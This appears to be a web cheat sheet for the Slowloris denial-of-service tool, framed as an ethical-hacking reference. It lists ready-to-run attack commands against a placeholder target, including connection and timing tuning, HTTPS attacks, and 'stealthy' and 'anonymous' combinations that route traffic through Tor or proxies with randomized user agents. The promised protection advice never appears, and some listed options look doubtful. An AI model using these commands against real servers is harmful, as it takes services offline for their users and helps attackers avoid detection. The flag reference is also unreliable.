What is Slowloris?
Slowloris is a classic denial-of-service (DoS) attack tool that targets web servers using partial HTTP requests. This cheatsheet provides a quick, practical overview of how to use Slowloris, understand its impact, and protect against it in your ethical hacking and cybersecurity research.
Slowloris Cheatsheet
The Low Bandwidth DoS Tool Reference Guide
Basic Slowloris Usage
Basic Attack
slowloris -dns target.com
Basic attack against target.com with default settings.
Specify Port
slowloris -dns target.com -port 8080
Attack target on a specific port (default is 80).
HTTPS Attack
slowloris -dns target.com -https
Perform attack over HTTPS (port 443).
Specify IP Instead of DNS
slowloris -ip 192.168.1.1
Attack using IP address instead of domain name.
Verbose Mode
slowloris -dns target.com -v
Enable verbose output for debugging.
Test Mode
slowloris -dns target.com -test
Test if target is vulnerable without actually attacking.
Connection Options
Number of Connections
slowloris -dns target.com -num 500
Set number of connections to create (default is 150).
Sockets Per Thread
slowloris -dns target.com -sockets 100
Set number of sockets per thread (default is 50).
Randomize Data Length
slowloris -dns target.com -rand
Randomize the length of follow-up data.
Custom HTTP Headers
slowloris -dns target.com -header "User-Agent: Mozilla/5.0"
Add custom HTTP headers to requests.
Multiple Headers
slowloris -dns target.com -header "User-Agent: Custom" -header "Accept: */*"
Add multiple custom HTTP headers.
Keep-Alive Timeout
slowloris -dns target.com -timeout 15
Set keep-alive timeout in seconds (default is 10).
Timing Options
Interval Between Data
slowloris -dns target.com -interval 5
Seconds between sending keep-alive headers (default is 2).
Connection Timeout
slowloris -dns target.com -ctimeout 30
Connection timeout in seconds (default is 20).
Reconnection Delay
slowloris -dns target.com -reconn 10
Seconds to wait before reconnecting (default is 5).
Randomize Intervals
slowloris -dns target.com -randtime
Randomize the interval between sending data.
Attack Duration
slowloris -dns target.com -duration 300
Run attack for specified seconds (0 for unlimited).
Proxy Options
Use SOCKS Proxy
slowloris -dns target.com -socks 127.0.0.1:9050
Route traffic through SOCKS proxy.
Use HTTP Proxy
slowloris -dns target.com -http-proxy 192.168.1.100:8080
Route traffic through HTTP proxy.
Proxy Authentication
slowloris -dns target.com -http-proxy 192.168.1.100:8080 -proxy-auth user:pass
Use authenticated HTTP proxy.
Tor Network
slowloris -dns target.com -tor
Automatically use Tor network (requires Tor installed).
Advanced Options
Custom HTTP Method
slowloris -dns target.com -method POST
Use custom HTTP method (default is GET).
Custom Path
slowloris -dns target.com -path "/vulnerable/page"
Specify custom path to request (default is /).
Custom Data
slowloris -dns target.com -data "param1=value1"
Send custom data with requests.
Random User Agents
slowloris -dns target.com -randagents
Use random user agents for each connection.
Follow Redirects
slowloris -dns target.com -follow
Follow HTTP redirects (3xx responses).
IPv6 Attack
slowloris -dns target.com -ipv6
Use IPv6 instead of IPv4.
Save Results
slowloris -dns target.com -log attack.log
Save output to log file.
Common Attack Combinations
Standard Attack
slowloris -dns target.com -num 300 -sockets 100 -timeout 15
Standard attack with increased connections and timeout.
Stealthy Attack
slowloris -dns target.com -interval 5 -rand -randtime -randagents
More stealthy attack with randomized parameters.
HTTPS Attack
slowloris -dns target.com -https -num 200 -sockets 75 -timeout 20
HTTPS attack with custom parameters.
Anonymous Attack
slowloris -dns target.com -tor -randagents
Attack routed through Tor with random user agents.
